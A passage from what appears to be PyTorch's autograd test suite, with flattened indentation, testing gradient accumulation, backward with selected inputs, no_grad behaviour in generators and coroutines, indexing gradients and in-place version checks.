# It should be possible to call retain_grad() multiple times
h1.retain_grad()
h1.retain_grad()
# Gradient should be accumulated
out.backward(retain_graph=True)
self.assertEqual(h1 * 2, h1.grad)
out.backward(retain_graph=True)
self.assertEqual(h1 * 4, h1.grad)
with torch.no_grad():
input.grad.zero_()
# It should be a no-op for leaves
input.retain_grad()
input.retain_grad()
out.backward()
self.assertEqual(input * 18, input.grad)
def test_retain_grad_cycle(self):
x = torch.ones(5, 5, requires_grad=True)
def run_test():
y = x * 2
y.retain_grad()
return y / 2, torch._C._WeakTensorRef(y)
z, ref = run_test()
self.assertTrue(ref.expired())
z.sum().backward()
def test_backward(self):
v = torch.randn(5, 5, requires_grad=True)
x = torch.randn(5, 5, requires_grad=True)
y = (torch.rand(5, 5) + 0.1).requires_grad_(True)
z = torch.randn(5, 5, requires_grad=True)
grad_output = torch.randn(5, 5)
v.backward(grad_output)
self.assertEqual(v.grad, grad_output)
a = x + (y * z) + 4 * z ** 2 * x / y
a.backward(grad_output)
x_grad = 4 * z.pow(2) / y + 1
y_grad = z - 4 * x * z.pow(2) / y.pow(2)
z_grad = 8 * x * z / y + y
self.assertEqual(x.grad, x_grad * grad_output)
self.assertEqual(y.grad, y_grad * grad_output)
self.assertEqual(z.grad, z_grad * grad_output)
def test_sparse_mm_backward(self):
size = (3, 3)
sparse = torch.sparse_coo_tensor(size, requires_grad=True)
dense = torch.randn(size, requires_grad=True)
with self.assertRaisesRegex(
RuntimeError,
"The backward pass for this operation requires the 'mat1' tensor to be strided,"):
z = dense.addmm(sparse, dense)
mm_test_cases = [
# a requires grad, a is sparse, b requires grad, b is sparse, error message
(False, True, True, False, None),
(False, False, True, True, "The backward pass for this operation requires the 'mat2'"),
(False, True, True, True, "The backward pass for this operation requires the 'mat2'"),
(True, False, True, True, "The backward pass for this operation requires the 'mat2'"),
(True, True, False, False, "The backward pass for this operation requires the 'self'"),
(True, True, True, False, "The backward pass for this operation requires the 'self'"),
(True, True, True, True, "The backward pass for this operation requires the 'mat2'"),
]
for a_req_grad, a_is_sparse, b_req_grad, b_is_sparse, err_msg in mm_test_cases:
# We should only be testing cases with sparse inputs, and at least one
# input needs to require grad so we can call a backward pass
assert a_is_sparse or b_is_sparse
assert a_req_grad or b_req_grad
a = torch.randn(size, requires_grad=a_req_grad)
if a_is_sparse:
a = a.to_sparse()
b = torch.randn(size, requires_grad=b_req_grad)
if b_is_sparse:
b = b.to_sparse()
# If no error expected, check that sparse and dense cases match
if err_msg is None:
r = a.mm(b)
r.sum().backward()
a_grad = None if a.grad is None else a.grad.clone().detach()
b_grad = None if b.grad is None else b.grad.clone().detach()
# Redo with only dense tensors
a = (a.to_dense() if a.is_sparse else a).clone().detach()
a.requires_grad = a_req_grad
b = (b.to_dense() if b.is_sparse else b).clone().detach()
b.requires_grad = b_req_grad
r = a.mm(b)
r.sum().backward()
self.assertEqual(a_grad, a.grad)
self.assertEqual(b_grad, b.grad)
else:
with self.assertRaisesRegex(RuntimeError, err_msg):
a.mm(b)
def test_multi_backward(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
q = torch.randn(5, 5, requires_grad=True)
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
q2 = q * 2
z = x + y + q2
c = a * b + q2
grad_z = torch.randn(5, 5)
grad_c = torch.randn(5, 5)
torch.autograd.backward([z, c], [grad_z, grad_c])
self.assertEqual(x.grad, grad_z)
self.assertEqual(y.grad, grad_z)
self.assertEqual(a.grad, grad_c * b)
self.assertEqual(b.grad, grad_c * a)
self.assertEqual(q.grad, (grad_c + grad_z) * 2)
def test_multi_backward_no_grad(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=False)
z = x + y
q = y * 2
# NB: we currently raise an exception if any arguments to backwards
# have requires_grad=False and don't have a grad_fn. We may want to
# relax that check to a warning.
def call_backwards():
torch.autograd.backward([z, q], [torch.ones(5, 5), torch.ones(5, 5)])
self.assertRaises(RuntimeError, call_backwards)
def test_backward_with_inputs(self):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
def fn():
return x ** 2 + y * x + y ** 2
gradient = torch.ones(2, 2)
x_grad_expected = 2 * x + y
y_grad_expected = x + 2 * y
@torch.no_grad()
def reset_grad():
x.grad.zero_()
y.grad.zero_()
torch.autograd.backward(fn(), gradient, inputs=[x, y])
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(y.grad, y_grad_expected)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=[x])
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(y.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=[y])
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=y)
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
self.assertRaisesRegex(RuntimeError, 'cannot be empty',
lambda: torch.autograd.backward(fn(), gradient, inputs=[]))
def test_backward_with_nonleaf_inputs(self):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
x_nonleaf = x * 1
y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
z = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
out = x_nonleaf ** 2 + y * x_nonleaf + y ** 2
out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[x, y])
x_grad_expected = 2 * x + y
y_grad_expected = x + 2 * y
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, x_grad_expected)
self.assertRaisesRegex(RuntimeError, 'not a leaf Tensor',
lambda: out.backward(torch.ones(2, 2, dtype=torch.double),
create_graph=True, inputs=[x, y, x_nonleaf]))
# backward doesn't have an allow_unused flag, so the behavior of backward
# when variable is not part of the graph is as if allow_used were true
# x.grad will simply be None.
out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[z])
self.assertIsNone(z.grad)
def test_dependent_backward(self):
x = torch.randn(10, requires_grad=True)
y = x ** 2
z = y ** 3
go_y = torch.randn(10)
go_z = torch.randn(10)
torch.autograd.backward([y, z], [go_y, go_z])
xd = x
self.assertEqual(x.grad, 2 * xd * go_y + 6 * xd.pow(5) * go_z)
def test_save_output_nr(self):
x = torch.randn(10, requires_grad=True)
class MultiOutputFn(Function):
@staticmethod
def forward(ctx, x):
return x[:5], x[5:]
@staticmethod
def backward(ctx, *grad):
return torch.cat(grad)
a, b = MultiOutputFn.apply(x)
self.assertEqual(b.output_nr, 1)
class TestFn(Function):
@staticmethod
def forward(ctx, b):
ctx.save_for_backward(b)
return b * 2
@staticmethod
def backward(ctx, grad_b):
b, = ctx.saved_tensors
self.assertEqual(b.output_nr, 1)
TestFn.apply(b).sum().backward()
def test_free_deep_graph(self):
def scope():
depth = 150000
x = torch.randn(1, requires_grad=True)
y = x.clone()
# build a "chain" computation graph
for _ in range(depth):
y = y + y * 0.000001
# graph deletion occurs when the above locals go out of scope.
# In this case `del y` will trigger it but it's easier to leave
# it to Python to delete the locals.
# Should not stack overflow
scope()
def test_free_deep_graph_complicated(self):
def scope():
depth = 100000
randchoice = torch.randint(2, [depth, 2])
x = torch.randn(1, requires_grad=True)
y = x.clone()
# Hold the two previous values
prev_values = [None, None]
# Build a "chain with skip connections" graph
for _ in range(depth):
prev_tensors = [tensor for tensor in prev_values[:-1]
if tensor is not None]
prev_values.append(y)
prev_values.pop(0)
# Definitely pick one tensor to add
y += y * 0.000001
# Possibly add other tensors
nprev = len(prev_tensors)
if nprev == 2:
y += randchoice[depth].mul(torch.cat(prev_tensors)).sum()
# graph deletion occurs when the above locals go out of scope.
# Should not stack overflow
scope()
def test_free_deep_graph_pyfunction(self):
class MyOp(Function):
@staticmethod
def forward(ctx, tensor1, tensor2):
return tensor1 + tensor2
@staticmethod
def backward(ctx, grad_output):
return grad_output, grad_output
def scope():
depth = 150000
x = torch.randn(1, requires_grad=True)
y = x.clone()
# build deeply nested computation graph
for _ in range(depth):
y = MyOp.apply(y, y)
# graph deletion occurs when the above locals go out of scope.
# Should not stack overflow
scope()
def test_no_unnecessary_save(self):
# If we kept x in the derivative Function of x * 2 we would
# get an error in the backward that would complain that we've
# modified x, which was needed for gradient computation.
# Since we should elide unnecessary saves, this test should pass.
mu = torch.ones(1, requires_grad=True)
x = torch.empty(1)
loss = 0
for i in range(3):
x.detach_()
x.copy_(mu + i)
ft = torch.tensor([float(i)])
multiplied = x * ft
s = multiplied.sum()
loss += s
loss.backward()
def test_no_grad(self):
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5) * 4
with torch.no_grad():
w = x + y
@torch.no_grad()
def adder(x, y):
return x + y
z = adder(x, y)
self.assertFalse(w.requires_grad)
self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
self.assertIsNone(w.grad_fn)
self.assertFalse(z.requires_grad)
self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
self.assertIsNone(z.grad_fn)
# test nested decorator and with-statement on no_grad
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
w = adder(x, y)
self.assertFalse(torch.is_grad_enabled())
def test_set_grad_generator_functions(self):
@torch.no_grad()
def gen_no_grad():
for i in range(10):
self.assertEqual(torch.is_grad_enabled(), False)
yield i
with torch.enable_grad():
for _ in gen_no_grad():
self.assertEqual(torch.is_grad_enabled(), True)
@torch.enable_grad()
def gen_enable_grad():
for i in range(10):
self.assertEqual(torch.is_grad_enabled(), True)
yield i
with torch.no_grad():
for _ in gen_enable_grad():
self.assertEqual(torch.is_grad_enabled(), False)
def test_set_grad_generator_functions_recursive(self):
# enable_grad_decorator_recursive and no_grad_decorator_recursive call each other
# recursively, to ensure that the decorators preserve the caller's setting
@torch.enable_grad()
def enable_grad_decorator_recursive(depth):
self.assertTrue(torch.is_grad_enabled())
if depth > 0:
no_grad_decorator_recursive(depth - 1)
self.assertTrue(torch.is_grad_enabled())
@torch.no_grad()
def no_grad_decorator_recursive(depth):
self.assertFalse(torch.is_grad_enabled())
if depth > 0:
enable_grad_decorator_recursive(depth - 1)
self.assertFalse(torch.is_grad_enabled())
# enable_grad_context_manager_recursive and no_grad_context_manager_recursive call
# each other recursively, to ensure that the decorators preserve the caller's setting
def enable_grad_context_manager_recursive(depth):
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
if depth > 0:
no_grad_context_manager_recursive(depth - 1)
self.assertTrue(torch.is_grad_enabled())
def no_grad_context_manager_recursive(depth):
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
if depth > 0:
enable_grad_context_manager_recursive(depth - 1)
self.assertFalse(torch.is_grad_enabled())
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
enable_grad_decorator_recursive(10)
self.assertTrue(torch.is_grad_enabled())
enable_grad_context_manager_recursive(10)
self.assertTrue(torch.is_grad_enabled())
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
enable_grad_decorator_recursive(10)
self.assertFalse(torch.is_grad_enabled())
enable_grad_context_manager_recursive(10)
self.assertFalse(torch.is_grad_enabled())
def test_set_grad_coroutines(self):
@torch.no_grad()
def coro_no_grad(n=10):
self.assertFalse(torch.is_grad_enabled())
for i in range(n):
self.assertFalse(torch.is_grad_enabled())
r = yield i
self.assertFalse(torch.is_grad_enabled())
self.assertEqual(i, r)
self.assertFalse(torch.is_grad_enabled())
@torch.enable_grad()
def coro_enable_grad(n=10):
self.assertTrue(torch.is_grad_enabled())
for i in range(n):
self.assertTrue(torch.is_grad_enabled())
r = yield i
self.assertTrue(torch.is_grad_enabled())
self.assertEqual(i, r)
self.assertTrue(torch.is_grad_enabled())
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
coro, r = coro_no_grad(), None
try:
while True:
self.assertTrue(torch.is_grad_enabled())
r = coro.send(r)
self.assertTrue(torch.is_grad_enabled())
except StopIteration:
pass
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
coro, r = coro_enable_grad(), None
try:
while True:
self.assertFalse(torch.is_grad_enabled())
r = coro.send(r)
self.assertFalse(torch.is_grad_enabled())
except StopIteration:
pass
def test_set_grad_coroutines_benign_exceptions(self):
class RecoverableException(Exception):
pass
@torch.no_grad()
def coro_no_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertFalse(torch.is_grad_enabled())
yield (-i if has_raised else i)
except RecoverableException:
self.assertFalse(torch.is_grad_enabled())
has_raised = True
@torch.enable_grad()
def coro_enable_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertTrue(torch.is_grad_enabled())
yield (-i if has_raised else i)
except RecoverableException:
self.assertTrue(torch.is_grad_enabled())
has_raised = True
with torch.enable_grad():
coro = coro_no_grad()
assert 0 == next(coro)
try:
while True:
r = coro.throw(RecoverableException)
self.assertLess(r, 0)
except StopIteration:
pass
with torch.no_grad():
coro = coro_enable_grad()
assert 0 == next(coro)
try:
while True:
r = coro.throw(RecoverableException)
self.assertLess(r, 0)
except StopIteration:
pass
def test_set_grad_coroutines_critical_exceptions(self):
class UnrecoverableException(Exception):
pass
class SecondaryException(Exception):
pass
@torch.no_grad()
def coro_no_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertFalse(torch.is_grad_enabled())
yield (-i if has_raised else i)
except UnrecoverableException:
self.assertFalse(torch.is_grad_enabled())
raise SecondaryException
@torch.enable_grad()
def coro_enable_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertTrue(torch.is_grad_enabled())
yield (-i if has_raised else i)
except UnrecoverableException:
self.assertTrue(torch.is_grad_enabled())
raise SecondaryException
with torch.enable_grad():
coro = coro_no_grad()
assert 0 == next(coro)
with self.assertRaises(SecondaryException):
coro.throw(UnrecoverableException)
with torch.no_grad():
coro = coro_enable_grad()
assert 0 == next(coro)
with self.assertRaises(SecondaryException):
coro.throw(UnrecoverableException)
def test_set_grad_coroutines_exit(self):
@torch.no_grad()
def coro_no_grad(state):
for i in range(10):
try:
self.assertFalse(torch.is_grad_enabled())
yield i
except GeneratorExit:
self.assertFalse(torch.is_grad_enabled())
state.add('GeneratorExit')
raise
@torch.enable_grad()
def coro_enable_grad(state):
for i in range(10):
try:
self.assertTrue(torch.is_grad_enabled())
yield i
except GeneratorExit:
self.assertTrue(torch.is_grad_enabled())
state.add('GeneratorExit')
raise
state = set()
with torch.enable_grad():
coro = coro_no_grad(state)
for i in range(5):
next(coro)
coro.close()
self.assertTrue('GeneratorExit' in state)
state = set()
with torch.no_grad():
coro = coro_enable_grad(state)
for i in range(5):
next(coro)
coro.close()
self.assertTrue('GeneratorExit' in state)
def test_no_grad_python_function(self):
"""Python Functions should respect grad mode."""
x = torch.ones(5, 5, requires_grad=True)
class MyOp(Function):
@staticmethod
def forward(self, x):
return x + 1
@staticmethod
def backward(self, dy):
return dy
with torch.no_grad():
y = MyOp.apply(x)
self.assertFalse(y.requires_grad)
def test_indexing(self):
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
def compare(x, y, idx, indexed_tensor, indexed_var):
indexed_var_t = indexed_var.data
if not isinstance(indexed_tensor, torch.Tensor):
indexed_var_t = indexed_var_t[0]
self.assertEqual(indexed_tensor, indexed_var_t)
indexed_var.sum().backward()
expected_grad = torch.empty(x.size()).fill_(0)
expected_grad[idx] = 1
self.assertEqual(y.grad, expected_grad)
def check_index(x, y, idx):
if y.grad is not None:
with torch.no_grad():
y.grad.zero_()
indexed_tensor = x[idx]
indexed_var = y[idx]
compare(x, y, idx, indexed_tensor, indexed_var)
check_index(x, y, 1)
check_index(x, y, (1, 1))
check_index(x, y, slice(1, None))
check_index(x, y, slice(None, 2))
check_index(x, y, (slice(None, 2), 2))
check_index(x, y, (slice(1, 2), 2))
check_index(x, y, (1, slice(2, None)))
check_index(x, y, (slice(None, None), slice(2, None)))
check_index(x, y, torch.LongTensor([0, 2]))
check_index(x, y, torch.rand(4, 4).bernoulli().bool())
check_index(x, y, (Ellipsis, slice(2, None)))
check_index(x, y, ([0], [0]))
check_index(x, y, ([1, 2, 3], [0]))
check_index(x, y, ([1, 2], [2, 1]))
check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 3]]))
check_index(x, y, ([slice(None), [2, 3]]))
check_index(x, y, ([[2, 3], slice(None)]))
# advanced indexing, with less dim, or ellipsis
check_index(x, y, ([0]))
check_index(x, y, ([0], ))
x = torch.arange(1., 49).view(4, 3, 4)
y = Variable(x, requires_grad=True)
check_index(x, y, (slice(None), [0], [0]))
check_index(x, y, ([0], [0], slice(None)))
check_index(x, y, (slice(None), [0, 1, 2], [0]))
check_index(x, y, ([0, 1, 2], [0], slice(None)))
check_index(x, y, (slice(None), [1, 2], [2, 1]))
check_index(x, y, ([1, 2], [2, 1], slice(None)))
check_index(x, y, (slice(None), [[1, 2], [2, 0]], [[0, 1], [2, 3]]))
check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 2]], slice(None)))
check_index(x, y, (slice(None), slice(None), [2, 1]))
check_index(x, y, (slice(None), [2, 1], slice(None)))
check_index(x, y, ([2, 1], slice(None), slice(None)))
# advanced indexing, with less dim, or ellipsis
check_index(x, y, ([0], ))
check_index(x, y, ([0], slice(None)))
check_index(x, y, ([0], Ellipsis))
check_index(x, y, ([1, 2], [0, 1]))
check_index(x, y, ([1, 2], [0, 1], Ellipsis))
check_index(x, y, (Ellipsis, [1, 2], [0, 1]))
# advanced indexing, with a tensor wrapped in a variable
z = torch.LongTensor([0, 1])
zv = Variable(z, requires_grad=False)
seq = [z, Ellipsis]
seqv = [zv, Ellipsis]
if y.grad is not None:
with torch.no_grad():
y.grad.zero_()
indexed_tensor = x[seq]
indexed_var = y[seqv]
compare(x, y, seq, indexed_tensor, indexed_var)
def test_indexing_duplicates(self):
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = torch.LongTensor([1, 1, 3, 2, 1, 2])
y[idx].sum().backward()
expected_grad = torch.zeros(4, 4)
for i in idx:
expected_grad[i] += 1
self.assertEqual(y.grad, expected_grad)
# with advanced indexing
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = [[1, 1, 3, 2, 1, 2], [0]]
y[idx].sum().backward()
expected_grad = torch.zeros(4, 4)
for i in idx[0]:
for j in idx[1]:
expected_grad[i][j] += 1
self.assertEqual(y.grad, expected_grad)
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = [[[1, 2], [0, 0]], [[0, 1], [1, 1]]]
y[idx].sum().backward()
expected_grad = torch.tensor([[0., 2., 0., 0.],
[1., 0., 0., 0.],
[0., 1., 0., 0.],
[0., 0., 0., 0.]])
self.assertEqual(y.grad, expected_grad)
x = torch.arange(1., 65).view(4, 4, 4)
y = Variable(x, requires_grad=True)
idx = [[1, 1, 1], slice(None), slice(None)]
y[idx].sum().backward()
expected_grad = torch.empty(4, 4, 4).zero_()
expected_grad[1].fill_(3)
self.assertEqual(y.grad, expected_grad)
def test_index_backward_does_not_save_tensor(self):
# Example from https://github.com/pytorch/pytorch/issues/24853.
# if `index(tensor, indices)` saves `tensor` for backwards, then it will
# trigger a version check on `tensor` during the backward pass, which
# will cause the following code to error because `tensor` gets modified
# by the indexing line.
a = torch.tensor([1., 0, 0])
b = torch.zeros(3, requires_grad=True)
tensor = b + 0
tensor[a != 0] = tensor[a != 0]
tensor.backward(torch.zeros_like(tensor))
def test_volatile_deprecated(self):
v = torch.autograd.torch.randn(3, 3)
with warnings.catch_warnings(record=True) as w:
self.assertFalse(v.volatile)
self.assertIn('volatile', str(w[0].message))
def test_saved_variables_deprecated(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, tensor2):
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + tensor2
@staticmethod
def backward(ctx, grad_output):
var1, var2 = ctx.saved_variables
return (grad_output, grad_output)
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter("always")
x = torch.randn((3, 3), requires_grad=True)
y = torch.randn((3, 3), requires_grad=True)
model = MyFunction()
model.apply(x, y).sum().backward()
has_deprecated = map(lambda warn:
'deprecated' in str(warn) and
'saved_variables' in str(warn),
warns)
has_deprecated = reduce(lambda x, y: x or y, has_deprecated)
self.assertTrue(has_deprecated)
def test_requires_grad(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5)
z = torch.randn(5, 5, requires_grad=True)
a = x + y
self.assertFalse(a.requires_grad)
b = a + z
self.assertTrue(b.requires_grad)
def error():
raise RuntimeError
# Make sure backward isn't called on these
a._backward_hooks = OrderedDict()
x._backward_hooks = OrderedDict()
y._backward_hooks = OrderedDict()
a._backward_hooks['test'] = error
x._backward_hooks['test'] = error
y._backward_hooks['test'] = error
b.backward(torch.ones(5, 5))
def test_requires_grad_(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5, requires_grad=True)
self.assertIs(x, x.requires_grad_())
self.assertTrue(x.requires_grad)
self.assertIs(y, y.requires_grad_())
self.assertTrue(y.requires_grad)
self.assertIs(x, x.requires_grad_(True))
self.assertTrue(x.requires_grad)
self.assertIs(y, y.requires_grad_(True))
self.assertTrue(y.requires_grad)
z = x * y
self.assertRaises(RuntimeError, lambda: z.requires_grad_(False))
self.assertIs(z, z.requires_grad_())
self.assertTrue(z.requires_grad)
self.assertIs(z, z.requires_grad_(True))
self.assertTrue(z.requires_grad)
self.assertIs(x, x.requires_grad_(False))
self.assertFalse(x.requires_grad)
self.assertIs(y, y.requires_grad_(False))
self.assertFalse(y.requires_grad)
def test_requires_grad_inplace(self):
a = torch.randn(5, 5)
b = torch.randn(5, 5, requires_grad=True)
a += b
self.assertTrue(a.requires_grad)
# non-leaf
a = torch.randn(5, 5) + 0
b = torch.randn(5, 5, requires_grad=True)
a += b
self.assertTrue(a.requires_grad)
def test_no_requires_grad_inplace(self):
# basic case, should be able to modify inplace while requires_grad is False
a = torch.randn(2, 3)
a.add_(5)
a.requires_grad = True
a.sum().backward()
self.assertEqual(a.grad, torch.ones(2, 3))
# same but with a view
a = torch.randn(2, 3)
b = a[:]
b.add_(5)
a.requires_grad = True
a.sum().backward()
self.assertEqual(a.grad, torch.ones(2, 3))
# should fail if requires_grad = True when we modify inplace
a = torch.randn(2, 3)
b = a[:]
a.requires_grad = True
with self.assertRaises(RuntimeError):
a.add_(5)
with self.assertRaises(RuntimeError):
b.add_(5)
def test_attribute_deletion(self):
x = torch.randn((5, 5), requires_grad=True)
del x.grad
self.assertIsNone(x.grad)
with self.assertRaises(RuntimeError):
del x.data
with self.assertRaises(TypeError):
x.data = None
with self.assertRaises(RuntimeError):
del x.requires_grad
with self.assertRaises(RuntimeError):
del x._grad_fn
with self.assertRaises(RuntimeError):
del x._backward_hooks
def test_duplicate_backward_root(self):
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
x = a * b
grad_output = torch.randn_like(x)
torch.autograd.backward([x, x], [grad_output, grad_output])
self.assertEqual(a.grad, b * grad_output * 2)
self.assertEqual(b.grad, a * grad_output * 2)
def test_backward_no_grad(self):
a = torch.randn(5, 5, requires_grad=True)
b = a + 2
with self.assertRaises(RuntimeError):
torch.autograd.backward([b], [None])
def test_backward_twice_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
self.assertRaisesRegex(RuntimeError, 'Specify retain_graph=True',
lambda: c.backward(torch.tensor([1, 1, 1], dtype=torch.double)))
def test_backward_twice_retained_graph_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = b + 1
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_retained_graph_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_next_functions(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
a = x + y
self.assertIsNotNone(a.grad_fn)
next_functions = a.grad_fn.next_functions
self.assertEqual(len(next_functions), 2)
self.assertIsInstance(next_functions[0][0], torch._C._functions.AccumulateGrad)
self.assertEqual(next_functions[0][1], 0)
self.assertIsInstance(next_functions[1][0], torch._C._functions.AccumulateGrad)
self.assertEqual(next_functions[1][1], 0)
b = a + 5
next_functions = b.grad_fn.next_functions
self.assertEqual(len(next_functions), 2)
self.assertIs(next_functions[0][0], a.grad_fn)
self.assertIs(next_functions[1][0], None)
def test_inplace(self):
x = torch.ones(5, 5, requires_grad=True)
y = Variable(torch.ones(5, 5) * 4, requires_grad=True)
z = x * y
q = z + y
w = z * y
z.add_(2)
# Add doesn't need it's inputs to do backward, so it shouldn't raise
q.backward(torch.ones(5, 5), retain_graph=True)
# Mul saves both inputs in forward, so it should raise
self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
z = x * y
q = z * y
r = z + y
w = z.add_(y)
# w is a the last expression, so this should succeed
w.backward(torch.ones(5, 5), retain_graph=True)
# r doesn't use the modified value in backward, so it should succeed
r.backward(torch.ones(5, 5), retain_graph=True)
# q uses dirty z, so it should raise
self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))
with torch.no_grad():
x.grad.zero_()
m = x / 2
z = m + y / 8
q = z * y
r = z + y
prev_version = z._version
w = z.exp_()
self.assertNotEqual(z._version, prev_version)
r.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(x.grad, torch.ones(5, 5) / 2)
w.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(x.grad, torch.empty(5, 5).fill_((1 + math.e) / 2))
self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))
leaf = torch.ones(5, 5, requires_grad=True)
x = leaf.clone()
x.add_(10)
self.assertEqual(x, torch.ones(5, 5) * 11)
# x should be still usable
y = x + 2
y.backward(torch.ones(5, 5))
self.assertEqual(leaf.grad, torch.ones(5, 5))
z = x * y
x.add_(2)
self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
def test_mark_non_differentiable(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
output = input > 0
ctx.mark_non_differentiable(output)
return output
@staticmethod
def backward(ctx, grad_output):
return (grad_output * 0).to(torch.double)
x = torch.randn(5, 5, requires_grad=True)
mask = MyFunction.apply(x)
self.assertFalse(mask.requires_grad)
y = x.masked_fill(mask, 0)
y.sum().backward()
def test_mark_non_differentiable_mixed(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
a = input + 1
b = input + 2
ctx.mark_non_differentiable(a)
return a, b
@staticmethod
def backward(ctx, grad_a, grad_b):
self.assertTrue((grad_a == 0).all())
self.assertTrue((grad_b == 1).all())
return grad_b
x = torch.randn(5, 5, requires_grad=True)
a, b = MyFunction.apply(x)
self.assertFalse(a.requires_grad)
self.assertTrue(b.requires_grad)
b.sum().backward()
self.assertEqual(x.grad, torch.ones(5, 5))
def test_mark_non_differentiable_none(self):
# This used to segfault because MyFunction would send back null
# gradients to MulBackward, which is implemented in C++. C++
# implemented functions expect incoming grad_ouptuts to be non-null.
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
output = input.clone()
ctx.mark_non_differentiable(output)
return output
@staticmethod
def backward(ctx, grad_output):
return None
x = torch.randn(5, 5, requires_grad=True)
r = MyFunction.apply(x * x)
(r * x).sum().backward()
def test_return_duplicate(self):
class DoubleDuplicate(Function):
@staticmethod
def forward(ctx, x):
output = x * 2
return output, output
@staticmethod
def backward(ctx, grad1, grad2):
return grad1 * 2 + grad2 * 2
def fn(x):
a, b = DoubleDuplicate.apply(x)
self.assertIs(a, b)
return a + b
x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(fn, [x])
gradgradcheck(fn, [x])
def test_return_duplicate_inplace(self):
class DoubleInplace(Function):
@staticmethod
def forward(ctx, x):
x.mul_(2)
ctx.mark_dirty(x)
return x, x
@staticmethod
def backward(ctx, grad1, grad2):
return grad1 * 2 + grad2 * 2
def inplace_fn(x):
a, b = DoubleInplace.apply(x.clone())
self.assertIs(a, b)
return a + b
x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(inplace_fn, [x])
gradgradcheck(inplace_fn, [x])
# Can't modify leaf variables in-place
self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x))
# Functions which modify views in-place must return only one output
self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x.clone()[0]))
@suppress_warnings
def test_resize(self):
x = torch.ones(2, 3)
self.assertTrue(x.resize(3, 2).size() == (3, 2))
def _test_setitem(self, size, index):
x = torch.ones(*size, requires_grad=True)
y = x + 2
y_version = y._version
y[index] = 2
self.assertNotEqual(y._version, y_version)
y.backward(torch.ones(*size))
expected_grad = torch.ones(*size)
expected_grad[index] = 0
self.assertEqual(x.grad, expected_grad)
def _test_setitem_tensor(self, size, index):
x = torch.ones(*size, requires_grad=True)
y = x + 2
y_version = y._version
